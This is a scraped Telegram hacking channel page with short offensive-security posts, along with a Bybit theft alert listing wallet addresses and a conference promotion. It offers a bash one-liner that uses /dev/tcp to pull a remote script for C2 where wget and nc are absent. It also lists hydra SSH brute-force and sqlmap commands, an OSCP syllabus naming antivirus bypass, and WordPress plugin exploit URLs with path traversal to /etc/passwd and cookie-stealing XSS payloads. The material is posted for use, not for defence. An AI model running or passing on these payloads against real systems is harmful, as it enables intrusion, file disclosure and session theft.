en
Feedback
hacking vidhya

hacking vidhya

Open in Telegram

🚩 Channel was restricted by Telegram

Show more
No data
Subscribers
-824 hours
-137 days
+3730 days
Posts Archive
A useful one-liner that extracts all API endpoints from AngularJS and Angular JavaScript files.
curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
Don’t forget the reactions and stars⭐️! They fuel my energy to post such contents🔋✨. @hacking_vidhya

Different methods for Database hacking Database contains mission critical data of the corporate firm, which makes it an obvious target by hackers. Password guessing – Once the hacker gains control of web server, he looks for the application configuration files which typically contain the database server name, userid and password to access it. If the file is encrypted or if the information is hard-coded in the code for security reasons, hacker is left with an option to guess the password. It is found to be a common thing to leave the database system administrators account name unchanged, which solves half of hackers’ problem. In most cases the username and password are kept the same, if not, hacker can use guess work, or brute force method to gain access to the database. Depending upon the access level granted to the user, hacker gains control and is capable of doing further damage. Packet sniffing – Modern hackers gain control of the network in which the database server is hosted, and deploy a sniffer to capture packets flowing to and from the database server. These packets are then analyzed to decipher username and password combinations and the real target is to get this information for root database administrator. Query string manipulation – When a web server gets a request from a browser, it receives it in the form of a web url containing a query string parameter which directs the web application to database to fetch the requested data. If the application developer is not security aware, and not following best coding practices, this simple method of fetching data can lead to opening up loopholes. For example, if a list of doctors is being asked for on an insurance website, the code must ensure that a blank value in the zip code field should not be allowed. Doing so, the hacker can run a query and fetch entire data which he may not have access to, in ideal scenario. Privilege elevation – As mentioned earlier, database servers use roles and rules to control access of a user to a particular database or a table or resource in general. An attacker usually inject scripts which try to find out most generous level of privileges and upon finding one, uses it to create further damage. Few FOSS database servers such as MangoDB, were found to be victim of these bugs which were eventually fixed. Vulnerability exploitation – Like operating systems, even the database servers do have bugs resulting into serious vulnerabilities. Attackers can explore and exploit those either through the web layer, or by injecting a Trojan in the system dedicated for this purpose. Hackers are always looking for unpatched database system for this purpose. SQL Injection – This attack is not a pure database attack, but in fact a combination of database and web vulnerability. It’s a very well known type, in which an attacker uses webpages to plant the attack. It is done by including parts of SQL query statements in the web form, which is usually to be filled up by web user with relevant information. If the web page is not capable of handling this situation in a secure manner, it ends up sending this bogus request to the database. The attacker can simply run a select query to dump the entire database on his machine by this method, which makes it a favorite of hackers and hence dangerous from firm’s security standpoint. Database DoS – As a typical denial of service attack, the attacker plants a code either on the web server or the database server itself, which sends requests to the database in order to overwhelm it. For example, the queries can be either at application layer to dump database contents in a loop, or at TCP layer, it can be a SYN packet storm. The end result is, the database gives up at one point and stops responding to the queries, thus resulting into a complete website or application failure. Don’t forget the reactions and stars⭐️! They fuel my energy to post such contents🔋✨. @hacking_vidhya

1 liner bash for C2 without using any native program like wget, nc etc, esp containers. bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh' Don’t forget the reactions and stars⭐️! They fuel my energy to post such contents🔋✨. @hacking_vidhya

photo content

Repost from Exam Market
#MLSecOps #Tech_book "Large Language Models in Cybersecurity: Threats, Exposure and Mitigation", 2024. @examsreports

Don’t forget the reactions and stars⭐️! They fuel my energy to post such contents🔋✨.

Intresting XSS Payload
Intresting XSS Payload

The attacker just split 10K ETH to 39 addresses. If you are an exchange or service who follows my channel blacklist these addresses on all EVM chains: 0x40e98feeebad7ddb0f0534ccaa617427ea10187e 0x30a822cdd2782d2b2a12a08526452e885978fa1d 0x6d46bd3aff100f23c194e5312f93507978a6dc91 0x660bfcea3a5faf823e8f8bf57dd558db034dea1d 0x140c9ab92347734641b1a7c124ffdee58c20c3e3 0x8c7235e1a6eef91b980d0fca083347fbb7ee1806 0xb172f7e99452446f18ff49a71bfeecf0873003b4 0xcd7ec020121ead6f99855cbb972df502db5bc63a 0x0e8c1e2881f35ef20343264862a242fb749d6b35 0x2290937a4498c96effb87b8371a33d108f8d433f 0x1bb0970508316dc735329752a4581e0a4babc6b4 0xf0a16603289eaf35f64077ba3681af41194a1c09 0x5af75eab6bec227657fa3e749a8bfd55f02e4b1d 0xb4a862a81abb2f952fca4c6f5510962e18c7f1a2 0x959c4ca19c4532c97a657d82d97accbab70e6fb4 0xb72334cb9d0b614d30c4c60e2bd12ff5ed03c305 0xfc926659dd8808f6e3e0a8d61b20b871f3fa6465 0xfa3fcccb897079fd83bfba690e7d47eb402d6c49 0x51e9d833ecae4e8d9d8be17300aee6d3398c135d 0x1eb27f136bfe7947f80d6cee3cf0bfdf92b45e57 0x83c7678492d623fb98834f0fbcb2e7b7f5af8950 0x52207ec7b1b43aa5db116931a904371ae2c1619e 0x83ef5e80fad88288f770152875ab0bb16641a09e 0x23db729908137cb60852f2936d2b5c6de0e1c887 0xaf620e6d32b1c67f3396ef5d2f7d7642dc2e6ce9 0xcd1a4a457ca8b0931c3bf81df3cfa227adbdb6e9 0x96244d83dc15d36847c35209bbdc5bdde9bec3d8 0x09278b36863be4ccd3d0c22d643e8062d7a11377 0x3a21f4e6bbe527d347ca7c157f4233c935779847 0xbc3e5e8c10897a81b63933348f53f2e052f89a7e 0x9271eddda0f0f2bb7b1a0c712bdf8dbd0a38d1ab 0x4c198b3b5f3a4b1aa706dac73d826c2b795ccd67 0x684d4b58dc32af786bf6d572a792ff7a883428b9 0xd3c611aed139107dec2294032da3913bc26507fb 0x9ef42873ae015aa3da0c4354aef94a18d2b3407b 0xbde2cc5375fa9e0383309a2ca31213f2d6cabcbd 0xe69753ddfbedbd249e703eb374452e78dae1ae49 0xe9bc552fdfa54b30296d95f147e3e0280ff7f7e6 0xbca02b395747d62626a65016f2e64a20bd254a39 Update: 10K ETH split to another 9 addresses 0xF302572594a68aA8F951faE64ED3aE7DA41c72Be 0x21032176B43d9f7E9410fB37290a78f4fEd6044C 0xD5b58Cf7813c1eDC412367b97876bD400ea5c489 0xA5A023E052243b7cce34Cbd4ba20180e8Dea6Ad6 0x723a7084028421994d4a7829108D63aB44658315 0x1512fcb09463A61862B73ec09B9b354aF1790268 0xEB0bAA3A556586192590CAD296b1e48dF62a8549 0xf03AfB1c6A11A7E370920ad42e6eE735dBedF0b1 0x55CCa2f5eB07907696afe4b9Db5102bcE5feB734

photo content

1.4 Billion Worth of ETH and stETH got hacked from bybit. 🚨

🗿Join the Movement – Spread the Word About OSINTcon 2025!🗿 Hey OSINT community! We’re bringing together the best minds in O
🗿Join the Movement – Spread the Word About OSINTcon 2025!🗿 Hey OSINT community! We’re bringing together the best minds in OSINT for OSINTcon 2025 (May 23-25) – a FREE virtual conference packed with expert talks, hands-on workshops, and networking! 🎉 We need YOUR help to make it epic! 📢 How You Can Help: ✅ Post about OSINTcon 2025 & why you're excited! ✅ Use #OSINTcon & tag us @OSINTAmbition ✅ Tell everyone to register now: www.osintconference.com ✅ Invite fellow OSINT lovers to join the movement! Let’s grow the OSINT community together! 🚀 #OSINTAmbition #OSINTcon #OpenSourceIntelligence #OSINTCommunity #CyberSecurity #OSINTAmbition #LetsGetOSINT

15 efficient commands for pentesting on Linux: nmap: nmap -p- <target IP> (Scan all ports on a target) netcat: nc -nv <target IP> <port> (Open a TCP connection to a target) tcpdump: tcpdump -i eth0 tcp port 80 (Capture network traffic on port 80) wireshark: wireshark (Start the Wireshark GUI) traceroute: traceroute <target IP> (Show the route that packets take to reach a target) dig: dig <target domain> (Query DNS information for a domain) whois: whois <target domain> (Lookup WHOIS information for a domain) ncat: ncat -lvp <port> (Listen on a specific port for incoming connections) snort: snort -c /etc/snort/snort.conf -l /var/log/snort/ -A console (Start Snort with a specific configuration file and log directory) john: john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 <hashfile> (Crack an MD5 hash using the rockyou wordlist) hydra: hydra -l <username> -P /usr/share/wordlists/rockyou.txt <target IP> ssh (Brute-force SSH login using a username and password list) metasploit: msfconsole (Start the Metasploit Framework console) sqlmap: sqlmap -u "http://example.com/?id=1" --dbs (Scan a website for SQL injection vulnerabilities) nikto: nikto -h <target IP> (Scan a web server for vulnerabilities and misconfigurations) wpscan: wpscan --url <target URL> --enumerate u (Scan a WordPress site for vulnerabilities and user information) JOIN @hacking_vidhya FOR MORE! ✅

📌OSCP Syllabus is given here :- [+] Windows & Linux Exploitation • FTP Exploitation • SSH Exploitation • RDP Exploitation • WinRM Exploitation • WebDav Exploitation • MySQL RCE Exploit [+] Active Directory • Active Directory Basic • AD External Enumeration • AD Initial Exploitation • Internal Enumeration/Local Enumeration • Local & Domain Privilege Escalation • Lateral Movement & Pivoting • AD Persistence • Deligation Attacks • Capstone Challenge [+] Windows Privilege Escalation • Service Exploit • Registry Exploit • Access Token Impersonation • Kernel Exploit [+] Linux Privilege Escalation • Kernel Exploit • SUID/GUID Exploit • Sudo Abuse • Cron Jobs • Weak File Permission • SSH Key [+] Memory Corruption Exploit • Fundamental Understand • Memory Anatomy • CPU Register • CPU Flags • Stack & Heap • Buffer Overflow • Spiking & Fuzzing • Offset Finding • Overwriting EIP • Bad Char Detection • Getting Right Module • Shellcode Generation & Execution [+] Defence Evasion • Antivirus software Overview • Detection Methods • Understanding AMSI • Bypass AMSI Live • Antivirus bypass via Thread injection powershell script [+] Web Application Exploitation • Web Fundamental • DNS In detail • Website Recon • XSS Attacks • SQL injection • Remote Code Execution • Command Injection • Local File Inclusion • Remote File Inclusion • Broken Authentication/Account Takeover • Wordpress Exploitation • Wordpress Username Enumeration • Wordpress Username Enumeration 2nd method • Drupal Exploit Note :- this is just a sample syllabus. @hacking_vidhya

⚡️Wordpress Endpoints to look - check this if you have these plugin. ⚡️ /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd /wp-content/plugins/dzs-videogallery/admin/upload.php /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php /wp-content/plugins/hd-webplayer/playlist.php /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd @hacking_vidhya